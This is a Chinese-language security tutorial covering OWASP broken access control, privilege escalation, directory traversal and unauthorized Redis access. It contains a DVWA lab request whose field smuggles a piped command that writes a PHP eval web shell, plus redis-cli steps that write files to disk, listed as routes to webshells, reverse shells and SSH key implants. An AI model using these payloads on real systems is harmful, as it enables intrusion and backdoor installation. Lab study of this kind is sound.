1.失效的访问控制
1.1 OWASP Top 10
1.1.1 A5:2017-Broken Access Control
未对通过身份验证的用户实施恰当的访问控制。攻击者可以利用这些缺陷访问未经授权的功能或数据,例如:访问其他用户的帐户、查看敏感文件、修改其他用户的数据、更改访问权限等。
1.1.2 A01:2021-Broken Access Control
访问控制强制实施策略,使用户无法在其预期权限之外进行操作。失败的访问控制通常会导致未经授权的信息泄露、修改或销毁所有数据、或在用户权限之外执行业务功能。
1.2 失效访问控制类别
1.2.1 水平越权
在同级别账户中横向移动。
1.2.2 垂直越权
普通用户获取管理员权限。
1.3 攻防案例
1.3.1 DVWA 越权
POST /dvwa_2.0.1/vulnerabilities/exec/source/low.php HTTP/1.1 Host: 192.168.111.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.111.15/dvwa_2.0.1/vulnerabilities/exec/source/
Connection: close
Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded Content-Length: 77
ip=127.0.0.0.1|echo+"<?php+@eval($_REQUEST[777])?>"+>+shell.php&Submit=Submit
1.4 相关漏洞
1.4.1 目录遍历
目录穿越,目录遍历,Directory Traversal。Web 用户,通过某种方式,可以访问Web 根目录以外的文件,甚至执行系统命令。造成目录遍历漏洞的原因:
-
文件包含
-
文件读取
-
RCE
1.4.2 未授权访问
未授权访问,Unauthorized Access。重要资产根本没有做访问控制限制,导致黑客攻击者可以在没有授权的情况下操作重要资产,包括读写文件,执行命令等敏感操作。
2.未授权访问
2.1 Redis 未授权访问
2.1.1 Redis 介绍
-
Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。
-
Redis 数据库经常用于Web 应用的缓存。
-
Redis 可以与文件系统进行交互。
-
Redis 监听TCP/6379。
2.1.2 Redis 简单使用
┌──(cgjil�� zh-CN)-[~/vulhub/vulhub/redis/4-unacc]
└─$ redis-cli -h 127.0.0.1 127.0.0.1:6379> set name cgjil OK
127.0.0.1:6379> get name "cgjil"
127.0.0.1:6379> config set dir /tmp/
OK
127.0.0.1:6379> config set dbfilename cgjil.txt OK
127.0.0.1:6379> save OK
127.0.0.1:6379>
2.1.3 Redis 未授权访问
读取数据内容 | 读写系统文件 |
---|---|
数据 泄露 | 直接写webshell 计划任务反弹shell SSH免密登录 |